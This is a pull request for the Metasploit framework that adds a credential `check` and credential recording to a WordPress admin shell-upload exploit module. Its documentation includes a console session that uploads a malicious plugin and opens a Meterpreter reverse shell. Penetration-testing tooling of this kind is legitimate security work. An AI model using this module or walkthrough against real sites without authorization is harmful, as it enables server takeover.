### PR TITLE
Wordpress admin upload `check`

### DIFF
--- a/documentation/modules/exploit/unix/webapp/wp_admin_shell_upload.md
+++ b/documentation/modules/exploit/unix/webapp/wp_admin_shell_upload.md
@@ -1,0 +1,51 @@
+## Vulnerable Application
+
+This module takes an administrator username and password, logs into the
+admin panel, and uploads a payload packaged as a WordPress plugin.
+Becuase this is authenticated code execution by design, it should work
+on all versions of WordPress.
+
+### Vulnerable Application Installation
+
+You can get WordPress from [https://wordpress.org/download/](https://wordpress.org/download/)
+or from some Linux package managers. [Debian maintains an installation
+guide](https://wiki.debian.org/WordPress) that also works on Ubuntu.
+Note that in a default install of WP from apt, the plugins directory is
+owned by root, so unless you chown it to the web user, this module will
+not work. Doing so is common in real-world deployments to allow
+legitimate administrators to install plugins, so it is not unreasonable
+for your own installation.
+
+
+## Verification steps
+
+```
+msf > use exploit/unix/webapp/wp_admin_shell_upload
+msf exploit(wp_admin_shell_upload) > set USERNAME admin
+USERNAME => admin
+msf exploit(wp_admin_shell_upload) > set PASSWORD password
+PASSWORD => password
+msf exploit(wp_admin_shell_upload) > set TARGETURI /wp/
+TARGETURI => /wp/
+msf exploit(wp_admin_shell_upload) > run
+
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[*] Authenticating with WordPress using admin:password...
+[+] Login successful
+[+] Authenticated with WordPress
+[*] Preparing payload...
+[*] Uploading payload...
+[*] Acquired a plugin upload nonce: afa507398f
+[*] Uploaded plugin iHNhrYLmGR
+[*] Executing the payload at /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php...
+[*] Sending stage (33986 bytes) to 192.168.100.131
+[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.131:40039) at 2017-04-21 11:36:33 -0500
+[+] Deleted DcrpFXPOCG.php
+[+] Deleted iHNhrYLmGR.php
+
+meterpreter > pwd
+/var/lib/wordpress/wp-content/plugins/iHNhrYLmGR
+meterpreter >
+```
+
+

--- a/lib/msf/core/exploit/http/wordpress/login.rb
+++ b/lib/msf/core/exploit/http/wordpress/login.rb
@@ -14,17 +14,40 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Login
         'uri' => wordpress_url_login,
         'vars_post' => wordpress_helper_login_post_data(user, pass, redirect)
     }, timeout)
-    if res && res.redirect? && res.redirection && res.redirection.to_s == redirect
-      cookies = res.get_cookies
-      # Check if a valid wordpress cookie is returned
-      return cookies if
-        # current Wordpress
-        cookies =~ /wordpress(?:_sec)?_logged_in_[^=]+=[^;]+;/i ||
-        # Wordpress 2.0
-        cookies =~ /wordpress(?:user|pass)_[^=]+=[^;]+;/i ||
-        # Wordpress 2.5
-        cookies =~ /wordpress_[a-z0-9]+=[^;]+;/i
+    cookies = res.get_cookies
+
+    if cookies && (
+      # current Wordpress (2.6+)
+      cookies =~ /wordpress_(?:sec|logged_in_)[^=]+=[^;]+;/i ||
+      # Wordpress 2.5
+      cookies =~ /wordpress_[a-f0-9]+=[^;]+;/i ||
+      # Wordpress 2.0
+      cookies =~ /wordpress(?:user|pass)_[^=]+=[^;]+;/i
+    )
+
+      service_data = {
+        address: rhost,
+        port: rport,
+        protocol: 'tcp',
+        service_name: 'http',
+        workspace_id: myworkspace.id,
+      }
+
+      cdata = {
+        module_fullname: self.fullname,
+        origin_type: :service,
+        username: user,
+        private_data: pass,
+        private_type: :password,
+      }.merge(service_data)
+
+      core = create_credential(cdata)
+      login_data = { core: core }.merge(service_data)
+
+      create_credential_login(login_data)
+      return cookies
     end
+
 
     nil
   end

--- a/lib/msf/core/exploit/http/wordpress/login.rb
+++ b/lib/msf/core/exploit/http/wordpress/login.rb
@@ -14,13 +14,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Login
         'uri' => wordpress_url_login,
         'vars_post' => wordpress_helper_login_post_data(user, pass, redirect)
     }, timeout)
-    cookies = res.get_cookies
+    if res && res.redirect? && res.redirection && res.redirection.to_s == redirect
+      cookies = res.get_cookies
+    end
 
     if cookies && (
       # current Wordpress (2.6+)
       cookies =~ /wordpress_(?:sec|logged_in_)[^=]+=[^;]+;/i ||
       # Wordpress 2.5
-      cookies =~ /wordpress_[a-f0-9]+=[^;]+;/i ||
+      cookies =~ /wordpress_[a-z0-9]+=[^;]+;/i ||
       # Wordpress 2.0
       cookies =~ /wordpress(?:user|pass)_[^=]+=[^;]+;/i
     )
@@ -30,7 +32,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Login
         port: rport,
         protocol: 'tcp',
         service_name: 'http',
-        workspace_id: myworkspace.id,
+        workspace_id: myworkspace_id,
       }
 
       cdata = {
@@ -45,9 +47,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Login
       login_data = { core: core }.merge(service_data)
 
       create_credential_login(login_data)
+
       return cookies
     end
-
 
     nil
   end

--- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
+++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
@@ -40,6 +40,15 @@ class MetasploitModule < Msf::Exploit::Remote
       ], self.class)
   end
 
+  def check
+    cookie = wordpress_login(username, password)
+    if cookie.nil?
+      return CheckCode::Safe
+    end
+
+    CheckCode::Appears
+  end
+
   def username
     datastore['USERNAME']
   end


### PR DESCRIPTION
Adds a `check` method to `wp_admin_shell_upload` to verify that credentials work. Note that in a default install of WP from Debian repositories, this is insufficient to achieve code execution because the plugins directory is owned by root, so it only returns `Checkcode::Appears` if login was successful rather than `Checkcode::Vulnerable`.

This will also record credentials for the handful of other modules targeting WordPress that require authentication.

## Verification

List the steps needed to make sure this thing works

- [ ] Set up WordPress
- [ ] `use exploit/unix/webapp/wp_admin_shell_upload`
- [ ] set RHOST, USERNAME, and PASSWORD appropriately
- [ ] `check`
- [ ] **Verify** `creds` displays the values you set for USERNAME and PASSWORD
- [ ] `exploit`
- [ ] **Verify** getting a shell still works

